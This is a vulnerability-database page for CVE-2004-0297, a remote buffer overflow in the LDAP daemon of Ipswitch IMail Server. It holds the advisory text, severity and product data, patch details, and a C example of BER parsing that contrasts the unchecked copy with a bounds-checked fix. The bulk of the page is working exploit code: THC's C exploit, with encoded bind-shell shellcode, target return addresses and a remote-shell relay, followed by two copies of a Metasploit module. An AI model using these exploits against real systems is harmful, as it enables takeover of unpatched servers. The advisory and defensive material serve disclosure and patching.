CVE-2004-0297
CVSS 10.0
Published: 2004-11-23 00:00:00
Revised: 2008-09-10 15:25:44

[Original] Buffer overflow in the Lightweight Directory Access Protocol (LDAP) daemon (iLDAP.exe 3.9.15.10) in Ipswitch IMail Server 8.03 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via an LDAP message with a large tag length.


[CNNVD] Ipswitch IMail Server LDAP Daemon Remote Buffer Overflow Vulnerability (CNNVD-200411-149)

        Ipswitch IMail Server is a web-based mail solution.
        The Ipswitch LDAP daemon does not adequately validate user-supplied LDAP tags. A remote attacker can exploit this to trigger a buffer overflow and potentially execute arbitrary instructions on the system with the privileges of the LDAP daemon process.
        An LDAP message consists of BER-encoded elements, each a tag followed by a length and the content. For example, the bytes 0x02 0x03 0x0A 0x25 0xBD encode the INTEGER 665,021 (0xA25BD): tag 0x02, length 3, three content bytes. The daemon copies the content into a stack buffer using the attacker-supplied length without an adequate bounds check, so a message whose length field exceeds the buffer overwrites adjacent stack memory, including saved addresses, at the following instruction:
        .text:00401188 mov byte ptr [ebp+ecx+var_4], dl
        Carefully crafted content can therefore lead to execution of arbitrary instructions with the privileges of the LDAP daemon process.
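The bug class described above, as an added example written for this page (it is not Ipswitch code and not taken from the exploits below): a minimal BER tag-length-value reader that decodes the advisory's sample INTEGER, shows the unchecked copy pattern the cited instruction implements, and beside it the bounded version that rejects both a length larger than the bytes actually received and a length larger than the destination buffer. The buffer size `VALUE_BUF` and the function names are constructed for illustration; the `EXPLOIT_HDR` bytes are the 17-byte LDAP header used by the exploits further down this page, whose outer SEQUENCE claims 0x0a3d bytes and whose inner INTEGER carries the reserved length byte 0xFF.

```c
/* Added example (not from the advisory, Ipswitch, or the exploits on this page):
 * BER length parsing and the bounds check the IMail LDAP daemon lacked.
 * VALUE_BUF and all helper names are constructed for illustration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define VALUE_BUF 64  /* hypothetical fixed-size stack buffer in a message handler */

/* Parse a BER length at p[0..avail). Short form: one byte < 0x80. Long form:
 * (0x80|n) followed by n big-endian length bytes. Returns the number of
 * length bytes consumed, or 0 if malformed. 0x80 (indefinite length) and
 * 0xFF (reserved) are treated as malformed. */
static size_t ber_length(const uint8_t *p, size_t avail, uint32_t *len)
{
    if (avail < 1 || p[0] == 0x80 || p[0] == 0xff) return 0;
    if (p[0] < 0x80) { *len = p[0]; return 1; }
    size_t n = p[0] & 0x7f;
    if (n > 4 || avail < 1 + n) return 0;
    uint32_t v = 0;
    for (size_t i = 0; i < n; i++) v = (v << 8) | p[1 + i];
    *len = v;
    return 1 + n;
}

/* Decode an INTEGER element (tag 0x02, at most 4 content bytes, read as
 * unsigned): 02 03 0A 25 BD -> 0xA25BD. Returns 0 on success, -1 on error. */
int ber_decode_integer(const uint8_t *msg, size_t msg_len, uint32_t *value)
{
    uint32_t len; size_t hdr;
    if (msg_len < 2 || msg[0] != 0x02) return -1;
    hdr = ber_length(msg + 1, msg_len - 1, &len);
    if (hdr == 0 || len == 0 || len > 4 || len > msg_len - 1 - hdr) return -1;
    *value = 0;
    for (uint32_t i = 0; i < len; i++) *value = (*value << 8) | msg[1 + hdr + i];
    return 0;
}

/* The vulnerable pattern: trust the declared length and copy that many bytes
 * into the fixed stack buffer. This is what the cited
 * "mov byte ptr [ebp+ecx+var_4], dl" loop does. Kept only for contrast; a
 * declared length above the buffer size writes past 'out'. */
void copy_value_unchecked(const uint8_t *content, uint32_t len, uint8_t *out)
{
    for (uint32_t i = 0; i < len; i++) out[i] = content[i];
}

/* The fix: the declared length must fit both the bytes actually received and
 * the destination buffer. Returns the number of bytes copied, or -1. */
int copy_value_checked(const uint8_t *msg, size_t msg_len, uint8_t *out, size_t out_cap)
{
    uint32_t len; size_t hdr;
    if (msg_len < 2) return -1;                 /* need at least tag + length */
    hdr = ber_length(msg + 1, msg_len - 1, &len);
    if (hdr == 0) return -1;                    /* malformed length (e.g. 0xFF) */
    if (len > msg_len - 1 - hdr) return -1;     /* claims more than was received */
    if (len > out_cap) return -1;               /* would overflow the stack buffer */
    memcpy(out, msg + 1 + hdr, len);
    return (int)len;
}

/* LDAP header from the exploits on this page: outer SEQUENCE declares 0x0a3d
 * bytes with only 17 present; the inner INTEGER at offset 11 has length 0xFF. */
const uint8_t EXPLOIT_HDR[] =
    "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";

int main(void)
{
    static const uint8_t example[] = { 0x02, 0x03, 0x0a, 0x25, 0xbd };  /* constructed */
    uint8_t buf[VALUE_BUF];
    uint32_t v = 0;

    ber_decode_integer(example, sizeof example, &v);
    printf("INTEGER value: %u (0x%X)\n", v, v);
    printf("outer SEQUENCE accepted: %d\n",
           copy_value_checked(EXPLOIT_HDR, sizeof EXPLOIT_HDR - 1, buf, sizeof buf));
    printf("inner INTEGER (len 0xFF) accepted: %d\n",
           copy_value_checked(EXPLOIT_HDR + 11, sizeof EXPLOIT_HDR - 1 - 11, buf, sizeof buf));
    return 0;
}
```

Both checks matter independently: `len > msg_len - 1 - hdr` stops a short PDU from making the parser read past the data it holds, and `len > out_cap` is the one the daemon was missing; a parser that only compares against the receive buffer still overflows a smaller stack buffer. The same comparison, run on incoming PDUs before they reach the parser, is a usable detection rule for this class of message.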
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in complete system shutdown]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:ipswitch:imail:8.0.3  Ipswitch IMail 8.0.3
cpe:/a:ipswitch:imail:8.0.5  Ipswitch IMail 8.0.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0297
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0297
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-149
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/972334
(VENDOR_ADVISORY)  CERT-VN  VU#972334
http://www.securityfocus.com/bid/9682
(VENDOR_ADVISORY)  BID  9682
http://xforce.iss.net/xforce/xfdb/15243
(VENDOR_ADVISORY)  XF  imail-ldap-tag-bo(15243)
http://www.ipswitch.com/support/imail/releases/imail_professional/im805HF2.html
(UNKNOWN)  CONFIRM  http://www.ipswitch.com/support/imail/releases/imail_professional/im805HF2.html
http://www.osvdb.org/3984
(UNKNOWN)  OSVDB  3984
http://www.idefense.com/application/poi/display?id=74
(UNKNOWN)  IDEFENSE  20040217 Ipswitch IMail LDAP Daemon Remote Buffer Overflow

- Vulnerability information

Ipswitch IMail Server LDAP Daemon Remote Buffer Overflow Vulnerability
Critical  Unknown
2004-11-23 00:00:00  2005-05-13 00:00:00
Remote
        

- Advisories and patches

        Vendor patch:
        Ipswitch
        --------
        The vendor has released a hotfix for this issue; download it from the vendor's site:
        Ipswitch IMail 8.0.5:
        Ipswitch Hotfix im805HF2.exe
        ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/im805HF2.exe
        Note that 8.0.5 itself is listed as affected in the CPE data above; the hotfix is applied on top of 8.0.5, so an installation reporting 8.0.5 is not fixed until im805HF2 is present.

- Vulnerability information (157)

IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit (EDBID:157)
windows remote
2004-02-27 Verified
389 Johnny Cyberpunk
N/A [Download]
/********************************************************************/
/* THCimail 0.1 - Wind0wZ remote root exploit                       */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                */
/* THC PUBLIC SOURCE MATERIALS                                      */
/*                                                                  */
/* Bug was found by idefense or some idefense slaves ;)             */
/* http://www.idefense.com/application/poi/display?id=74&type=vuln  */
/*                                                                  */
/* compile with MS Visual C++ : cl THCimail.c                       */
/*                                                                  */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, */
/* dvorak, scut, stealth, FtR and Random                            */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>          /* _read()/_write() on the local console in shell() */
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

/* Return addresses, one per OS build (little-endian; see usage()) */
char *WIN2KEN = "\xc4\x2a\x02\x75";
char *WIN2KPG = "\xc4\x2a\xf9\x74";
char *WINXPSP1G = "\xfe\x63\xa1\x71";

/* "jmp short +6" over the return address that follows it; "JC" is padding */
#define jumper "\xeb\x06\x4a\x43"

/* LDAP PDU header: SEQUENCE (len 0x0a3d), messageID 1, bindRequest (len 0x136),
   then an INTEGER element whose length byte 0xff triggers the oversized copy */
char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";

/* 337-byte bind shell listening on TCP 31337; must contain no NUL bytes,
   because the final buffer is assembled with strcat() */
char shellcode[] =
"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
"\xda\x63\xe5\x70\x70\xda\x6f";


void usage(void);
void shell(SOCKET sock);

int main(int argc, char *argv[])
{
unsigned int os,ver,IMAILVER;
unsigned long addr = INADDR_NONE;
int rc;
SOCKET sock,sock2;
unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
unsigned int IMAIL6_7=60;   /* filler bytes before the jumper, IMail 6/7 */
unsigned int IMAIL_8=68;    /* filler bytes before the jumper, IMail 8   */

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
printf("tested on Imail 6-8\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

if(argc!=4)
usage();

ver = (unsigned short)atoi(argv[3]);
switch(ver)
{
case 0:
IMAILVER = IMAIL6_7;
break;
case 1:
IMAILVER = IMAIL_8;
break;
default:
printf("\nYou entered an illegal version !\n\n");
usage();
exit(-1);
}

/* one extra byte each so every piece is NUL-terminated for strcat() */
crapbuf1 = malloc(IMAILVER+1);
memset(crapbuf1,'X',IMAILVER);
crapbuf1[IMAILVER]=0;

printf("imailver = %d\n",IMAILVER);

crapbuf2 = malloc(2221);
memset(crapbuf2,'X',2220);
crapbuf2[2220]=0;

/* 17 header + 68 filler + 4 jumper + 4 ret + 337 shellcode + 2220 = 2650 bytes */
finalbuffer = malloc(2651);
memset(finalbuffer,0,2651);

printf("\n[*] building buffer\n");

strcat(finalbuffer,ldapshit);

strcat(finalbuffer,crapbuf1);

strcat(finalbuffer,jumper);

os = (unsigned short)atoi(argv[2]);
switch(os)
{
case 0:
strcat(finalbuffer,WIN2KEN);    /* Windows 2000 Server english, per usage() */
break;
case 1:
strcat(finalbuffer,WIN2KPG);
break;
case 2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("\nYou entered an illegal OS !\n\n");
usage();
exit(-1);
}

strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)   /* Winsock returns INVALID_SOCKET, not 0, on failure */
{
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(389);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,finalbuffer,2650,0);
printf("[*] Exploit sent successfully ! Sleeping a while ....\n");
Sleep(1000);
}
else
printf("\nCan't connect to ldap port!\n");

if(rc==0)
{
printf("[*] Trying to get a shell\n\n");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);   /* port the bind shellcode listens on */
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337 ;( maybe firewalled ...\n");
exit(-1);
}
shell(sock2);
closesocket(sock2);
}

shutdown(sock,1);
closesocket(sock);
WSACleanup();

free(crapbuf1);
free(crapbuf2);
free(finalbuffer);

exit(0);
}

void usage(void)
{
printf("\nUsage: <Host> <OS> <Imail Version>\n");
printf("Sample: THCimail 194.44.55.56 0 1\n\n");
printf("OS:\n");
printf("0 - Windows 2000 Server english all service packs\n");
printf("1 - Windows 2000 Professional german\n");
printf("2 - Windows XP SP1 german\n\n");
printf("Imail Version:\n");
printf("0 - Imail 6+7\n");
printf("1 - Imail 8\n");
exit(0);
}

/* relay stdin/stdout to the remote shell */
void shell(SOCKET sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];   /* hand-built one-entry fd_set: {fd_count=1, fd_array[0]=sock} (32-bit build) */

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

/* socket readable within 1s -> print what the shell sent; otherwise forward our stdin */
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = _write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = _read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}



// milw0rm.com [2004-02-27]

- Vulnerability information (16824)

IMail LDAP Service Buffer Overflow (EDBID:16824)
windows remote
2010-04-30 Verified
389 metasploit
N/A [Download]
##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IMail LDAP Service Buffer Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the LDAP service that is
				part of the IMail product. This module was tested against
				version 7.10 and 8.5, both running on Windows 2000.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2004-0297'],
					[ 'OSVDB', '3984'],
					[ 'BID', '9682'],
					[ 'URL', 'http://secunia.com/advisories/10880/'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
				],
			'DisclosureDate' => 'Feb 17 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(389)
			], self.class)
	end

	def exploit
		connect

		# LDAP PDU header from the THC exploit: SEQUENCE, messageID 1,
		# bindRequest, then an INTEGER whose length byte is 0xff
		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
		buf << "\xcc" * 5000

		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
		# Thanks to johnny cyberpunk for the 6/7 vs 8 diffs
		#
		# Each "buf[x, 4] = "\xeb\x06"" replaces four bytes with two and shrinks
		# the string, so the resulting layout is: jmp +6 at 77, ret (6.x/7.x)
		# at 81, jmp +6 at 85, ret (8.x) at 89, payload at 93. Whichever return
		# address the running build overwrites, the short jumps chain into the
		# payload.
		buf[77, 4] = "\xeb\x06"
		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
		buf[85, 4] = "\xeb\x06"
		buf[89, 4] = [target.ret].pack('V') # 8.x
		buf[93, payload.encoded.length] = payload.encoded

		sock.put(buf)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83017)

IMail LDAP Service Buffer Overflow (PacketStormID:F83017)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k
CVE-2004-0297
[Download]

This exploits a buffer overflow in the LDAP service that is part of the IMail product. This Metasploit module was tested against version 7.10 and 8.5, both running on Windows 2000.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IMail LDAP Service Buffer Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in the LDAP service that is
				part of the IMail product. This module was tested against
				version 7.10 and 8.5, both running on Windows 2000.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0297'],
					[ 'OSVDB', '3984'],
					[ 'BID', '9682'],
					[ 'URL', 'http://secunia.com/advisories/10880/'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",

				},
			'Platform'       => 'win',
			'Targets'        => 
				[

					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
				],
			'DisclosureDate' => 'Feb 17 2004',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(389)
				], self.class)
	end

	def exploit
		connect
		
		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
		buf << "\xcc" * 5000
		
		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
		# Thanks to johnny cyberpunk for the 6/7 vs 8 diffs
		
		buf[77, 4] = "\xeb\x06"
		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
		buf[85, 4] = "\xeb\x06"
		buf[89, 4] = [target.ret].pack('V') # 8.x
		buf[93, payload.encoded.length] = payload.encoded
		
		sock.put(buf)
		
		handler
		disconnect
	end

end
    

- Vulnerability information

3984
Ipswitch IMail LDAP Large Tag Overflow
Location: Remote / Network Access
Attack type: Denial of Service, Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Public, Commercial

- Vulnerability description

Ipswitch IMail contains a flaw that allows a remote attacker to execute arbitrary code or cause a denial of service. The issue is due to the Lightweight Directory Access Protocol (LDAP) daemon not properly sanitizing input of LDAP messages. If an attacker supplies such a message with an overly large tag, they may be able to crash the service or execute arbitrary code.

- Timeline

2004-02-17 2003-10-31
2004-02-17 Unknown

- Solution

Upgrade to version 8.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
